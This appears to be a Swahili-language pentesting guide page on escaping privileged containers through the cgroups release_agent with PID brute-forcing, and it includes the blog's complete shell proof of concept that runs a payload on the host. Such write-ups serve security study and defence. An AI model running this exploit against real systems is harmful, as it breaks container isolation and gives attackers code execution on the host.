Kwa maelezo zaidi angalia chapisho la blogu kutoka https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html. Hii ni muhtasari tu:

Mbinu hii inaelezea njia ya kutekeleza nambari ya mwenyeji kutoka ndani ya kontena, ikishinda changamoto zinazosababishwa na mipangilio ya dereva ya uhifadhi ambayo inaficha njia ya mfumo wa faili ya kontena kwenye mwenyeji, kama Kata Containers au mipangilio maalum ya devicemapper.

Hatua muhimu:

1. Kutambua Kitambulisho cha Mchakato (PIDs): Kwa kutumia kiungo cha ishara /proc/<pid>/root katika mfumo wa faili bandia wa Linux, faili yoyote ndani ya kontena inaweza kupatikana kulingana na njia ya mfumo wa faili ya mwenyeji. Hii inapita haja ya kujua njia ya mfumo wa faili ya kontena kwenye mwenyeji.

2. PID Bashing: Njia ya nguvu ya kufanya utafutaji kupitia PIDs kwenye mwenyeji. Hii inafanywa kwa kuangalia kwa utaratibu uwepo wa faili maalum kwenye /proc/<pid>/root/<file>. Wakati faili inapatikana, inaonyesha kuwa PID inayolingana inahusiana na mchakato unaoendesha ndani ya kontena lengwa.

3. Kuchochea Utekelezaji: Njia ya PID iliyokadiriwa imeandikwa kwenye faili ya cgroups release_agent. Hatua hii inachochea utekelezaji wa release_agent. Mafanikio ya hatua hii yanathibitishwa kwa kuangalia kuundwa kwa faili ya pato.

Mchakato wa Udukuzi

Mchakato wa udukuzi unahusisha seti ya hatua za kina, lengo likiwa kutekeleza mzigo kwenye mwenyeji kwa kudhani PID sahihi ya mchakato unaoendesha ndani ya kontena. Hapa ndivyo inavyofanyika:

1. Anzisha Mazingira: Skrini ya mzigo (payload.sh) inatayarishwa kwenye mwenyeji, na saraka ya kipekee inaundwa kwa ajili ya udhibiti wa cgroup.

2. Tayarisha Mzigo: Skrini ya mzigo, ambayo ina amri za kutekelezwa kwenye mwenyeji, inaandikwa na kuwezeshwa kutekelezwa.

3. Sanidi Cgroup: Cgroup inafungwa na kusanidiwa. Bendera ya notify_on_release inawekwa ili kuhakikisha kuwa mzigo unatekelezwa wakati cgroup inafunguliwa.

4. PID ya Nguvu ya Kikosi: Mzunguko unarudia PIDs inayowezekana, kila PID iliyokadiriwa inaandikwa kwenye faili ya release_agent. Hii kimsingi inaweka skrini ya mzigo kama release_agent.

5. Kuchochea na Kagua Utekelezaji: Kwa kila PID, cgroup.procs ya cgroup inaandikwa, ikichochea utekelezaji wa release_agent ikiwa PID ni sahihi. Mzunguko unaendelea hadi pato la skrini ya mzigo linapatikana, ikionyesha utekelezaji uliofanikiwa.

PoC kutoka kwenye chapisho la blogu:

#!/bin/sh

OUTPUT_DIR="/"
MAX_PID=65535
CGROUP_NAME="xyx"
CGROUP_MOUNT="/tmp/cgrp"
PAYLOAD_NAME="${CGROUP_NAME}_payload.sh"
PAYLOAD_PATH="${OUTPUT_DIR}/${PAYLOAD_NAME}"
OUTPUT_NAME="${CGROUP_NAME}_payload.out"
OUTPUT_PATH="${OUTPUT_DIR}/${OUTPUT_NAME}"

# Run a process for which we can search for (not needed in reality, but nice to have)
sleep 10000 &

# Prepare the payload script to execute on the host
cat > ${PAYLOAD_PATH} << __EOF__
#!/bin/sh

OUTPATH=\$(dirname \$0)/${OUTPUT_NAME}

# Commands to run on the host<
ps -eaf > \${OUTPATH} 2>&1
__EOF__

# Make the payload script executable
chmod a+x ${PAYLOAD_PATH}

# Set up the cgroup mount using the memory resource cgroup controller
mkdir ${CGROUP_MOUNT}
mount -t cgroup -o memory cgroup ${CGROUP_MOUNT}
mkdir ${CGROUP_MOUNT}/${CGROUP_NAME}
echo 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release

# Brute force the host pid until the output path is created, or we run out of guesses
TPID=1
while [ ! -f ${OUTPUT_PATH} ]
do
if [ $((${TPID} % 100)) -eq 0 ]
then
echo "Checking pid ${TPID}"
if [ ${TPID} -gt ${MAX_PID} ]
then
echo "Exiting at ${MAX_PID} :-("
exit 1
fi
fi
# Set the release_agent path to the guessed pid
echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent
# Trigger execution of the release_agent
sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs"
TPID=$((${TPID} + 1))
done

# Wait for and cat the output
sleep 1
echo "Done! Output:"
cat ${OUTPUT_PATH}